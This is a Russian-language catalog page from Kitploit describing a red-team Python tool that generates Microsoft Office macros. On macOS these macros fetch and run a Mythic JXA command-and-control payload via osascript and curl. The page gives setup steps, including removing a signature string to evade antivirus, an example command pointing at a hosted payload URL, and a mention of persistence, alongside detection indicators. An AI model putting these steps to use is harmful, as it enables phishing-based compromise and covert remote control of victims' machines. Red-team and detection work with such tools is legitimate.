Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Mythic-Macro-Generator — Скрипт на Python3 для генерации макроса для запуска полезной нагрузки Mythic. Автор: Cedric Owens | Kitploit
Инструменты/GitHubGitHub/cedowens/mythic-macro-generator
Инструменты фишингаФреймворки для эксплойтовГенерация полезной нагрузкиТестирование на ПроникновениеКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHubcedowens/mythic-macro-generator

Mythic-Macro-Generator

Скрипт на Python3 для генерации макроса для запуска полезной нагрузки Mythic. Автор: Cedric Owens

Репозиторий
4795 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Mythic-Macro-Generator

Скрипт на Python3 для генерации макросов MS Office для запуска полезных нагрузок Mythic JXA.

Этот скрипт генерирует макрос Office, который использует osascript для загрузки и выполнения полезной нагрузки Mythic JXA .js.

Шаги:

  1. Настройте сервер Mythic C2 и создайте полезную нагрузку "apfell" jxa (примечание: этот генератор предполагает, что полезная нагрузка использует http, а не https... если вы используете https, вы можете просто изменить скрипт генератора, чтобы curl использовал https). Скачайте эту полезную нагрузку на сервере Mythic.

  2. Удалите первую строку загрузчика Mythic JXA .js ("// Created by Cody Thomas - @its_a_feature_"). Известно, что некоторые сигнатуры статических A/V проверяют эту статическую строку. Разместите эту полезную нагрузку (например, поместите файл .js в папку и используйте python -m SimpleHTTPServer для хостинга).

  3. Запустите этот генератор макросов:

python3 jxa-macro.py -u [url к размещённой полезной нагрузке .js из шага #2]

пример: python3 jxa-macro.py -u http://192.168.1.1:8000/apfell2.js

  1. Текст макроса будет сохранён в файл в той же директории с именем "macro.txt"

  2. Скопируйте и вставьте этот макрос в документ MS Office.


Обнаружение:

Этот макрос порождает следующие родительско-дочерние связи, которые могут быть использованы для обнаружения:

Office Product (например, Microsoft Word.app) --> /bin/sh

Office Product (например, Microsoft Word.app) --> /bin/bash

Office Product (например, Microsoft Word.app) --> /usr/bin/curl


Примечание: Это запустит полезную нагрузку JXA внутри песочницы приложения. Однако Mythic имеет возможность добавлять постоянство через элементы входа даже из песочницы приложения.

Скачать инструмент